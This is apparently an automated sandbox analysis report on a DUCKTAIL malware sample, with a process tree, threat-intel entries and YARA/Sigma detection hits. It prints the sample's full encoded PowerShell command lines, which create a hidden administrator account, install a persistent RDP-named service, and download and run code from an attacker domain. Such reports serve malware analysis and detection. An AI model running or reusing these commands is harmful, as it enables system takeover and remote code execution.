    • powershell.exe (PID: 6868 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1724 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 4236 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 2268 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 1584 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7260 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 1384 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 7816 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 880 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 5524 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 5860 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 9136 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 8 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 7080 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: F651568CD1F1A7ABAEDD4389DA3A2F14)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DUCKTAILAccording to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000002A.00000002.4144371245.00007FF6B8B66000.00000004.00000001.01000000.0000000A.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
    • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
    • 0x11f94:$a2: 0123456789012345678901234567890123456789
    • 0x328ac:$a3: NTPASSWORD
    • 0x2f774:$a4: LMPASSWORD
    • 0x5cc54:$a5: aad3b435b51404eeaad3b435b51404ee
    • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
    Process Memory Space: powershell.exe PID: 7944INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x8bd90:$b1: ::WriteAllBytes(
    • 0x258a59:$b1: ::WriteAllBytes(
    • 0x6d5cf:$b2: ::FromBase64String(
    • 0x71fc5:$b2: ::FromBase64String(
    • 0x72a9d:$b2: ::FromBase64String(
    • 0x72b13:$b2: ::FromBase64String(
    • 0x7ceb1:$b2: ::FromBase64String(
    • 0x128a4a:$b2: ::FromBase64String(
    • 0x23e9f4:$b2: ::FromBase64String(
    • 0x23ea2a:$b2: ::FromBase64String(
    • 0x23ea8b:$b2: ::FromBase64String(
    • 0x23eb16:$b2: ::FromBase64String(
    • 0x23eb77:$b2: ::FromBase64String(
    • 0x23ebff:$b2: ::FromBase64String(
    • 0x23ec6b:$b2: ::FromBase64String(
    • 0x23eec7:$b2: ::FromBase64String(
    • 0x25aeb1:$b2: ::FromBase64String(
    • 0x35fc98:$b2: ::FromBase64String(
    • 0x36468e:$b2: ::FromBase64String(
    • 0x365166:$b2: ::FromBase64String(
    • 0x408c1a:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 4780INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1e9f02:$b1: ::WriteAllBytes(
    • 0x1d7423:$b2: ::FromBase64String(
    • 0x1d8f43:$b2: ::FromBase64String(
    • 0x1da32b:$b2: ::FromBase64String(
    • 0x1da39f:$b2: ::FromBase64String(
    • 0x1dbebf:$b2: ::FromBase64String(
    • 0x1e0d4d:$b2: ::FromBase64String(
    • 0x1e286d:$b2: ::FromBase64String(
    • 0x5e681:$b3: ::UTF8.GetString(
    • 0x76c20:$s1: -join
    • 0x77f85:$s1: -join
    • 0x2d6922:$s1: -join
    • 0xa37f8:$s3: reverse
    • 0xa3893:$s3: reverse
    • 0xac365:$s3: reverse
    • 0x1608fb:$s3: Reverse
    • 0x1688a2:$s3: Reverse
    • 0x1688c1:$s3: Reverse
    • 0x16c376:$s3: Reverse
    • 0x16c3bb:$s3: Reverse
    • 0x17511c:$s3: Reverse
    Process Memory Space: svczHost.exe PID: 5060JoeSecurity_Ducktail_6Yara detected DucktailJoe Security
      Process Memory Space: svczHost.exe PID: 5060hacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x14a8e3:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x14c03f:$a2: 0123456789012345678901234567890123456789
      • 0x1589e4:$a3: NTPASSWORD
      • 0x157727:$a4: LMPASSWORD
      • 0x16a1f9:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x14cf37:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
      Click to see the 1 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      42.2.myRdpService.exe.7ff6b8660000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x5118c4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x515d94:$a2: 0123456789012345678901234567890123456789
      • 0x5366ac:$a3: NTPASSWORD
      • 0x533574:$a4: LMPASSWORD
      • 0x560a54:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x518d54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_4780.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc5e7:$b1: ::WriteAllBytes(
      • 0x8a3a:$b2: ::FromBase64String(
      • 0xa55b:$b2: ::FromBase64String(
      • 0xb944:$b2: ::FromBase64String(
      • 0x52e:$b3: ::UTF8.GetString(
      • 0x868d:$s1: -join
      • 0x23e:$s4: +=
      • 0x261:$s4: +=
      • 0x1e39:$s4: +=
      • 0x1efb:$s4: +=
      • 0x6122:$s4: +=
      • 0x823f:$s4: +=
      • 0x8529:$s4: +=
      • 0x866f:$s4: +=
      • 0xbb01:$s4: +=
      • 0xbcfe:$s4: +=
      • 0xdfbe:$s4: +=
      • 0x64893:$s4: +=
      • 0x64913:$s4: +=
      • 0x649d9:$s4: +=
      • 0x64a59:$s4: +=

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5100, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ProcessId: 7852, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5100, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit, ProcessId: 7852, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded Invoke Keyword
      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: PowerShell Base64 Encoded WMI Classes
      Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
      Sigma detected: Suspicious Encoded PowerShell Command Line
